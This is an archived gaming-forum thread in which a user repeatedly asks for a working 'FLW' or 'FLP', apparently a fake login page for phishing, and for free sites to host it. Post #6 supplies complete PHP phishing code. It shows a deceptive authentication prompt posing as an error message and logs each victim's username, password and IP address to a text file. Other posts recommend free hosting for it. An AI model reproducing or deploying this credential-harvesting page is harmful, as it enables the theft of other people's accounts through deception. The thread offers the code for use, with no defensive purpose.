A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

I need help

982 views · started by BaHoo ·
#1
I need help
I need a working FLW or FLP and also a site
#2
I need help in using FLW or FLP
Can anyone help me about FLW or FLP?

I need a working FLW or FLP right now if there is anyone who can help me feel free to post in here please also post a working FLW or FLP and what particular free site i can use to host it!! thanks
#3
I can help you.
I used ripway since 110mb is fucking up on me.
#4
Try Webs - Make a free website, get free hosting
It's a pretty cool site. You can create your own site and upload html docs on it. There is a 7 day waiting period to upload them but other than that its a-okay.

---------- Post added at 12:05 PM ---------- Previous post was at 12:04 PM ----------

Alot of people are complaining about ripway. I heard it was some sort of virus or somethin like that.
#5
Exile can you post a FLW sample here??
#6
This is not my property:

          <?php 
if(isset($_SERVER['PHP_AUTH_USER'])){
$Handle = @fopen('Accs.txt', 'a');

@fwrite($Handle, "Username = {$_SERVER['PHP_AUTH_USER']}
");
@fwrite($Handle, "Password = {$_SERVER['PHP_AUTH_PW']}
");
@fwrite($Handle, "I.P. = {$_SERVER['REMOTE_ADDR']}

");
@fclose($Handle);

exit;
}

header('WWW-Authenticate: Basic realm="An error occured. Please enter your account informations."');
header('HTTP/1.0 401 Unauthorized');
exit;
?>


+Hosting sites.
#7
some of the sites there needs money to pay!! and its kinda hard to find one that is working lol
#8
holy shit how much threads are you going to make about this?
its fucking annoying.
#9
Your threads have been merged. If someone helps you once, you don't need another thread asking the same damn thing again.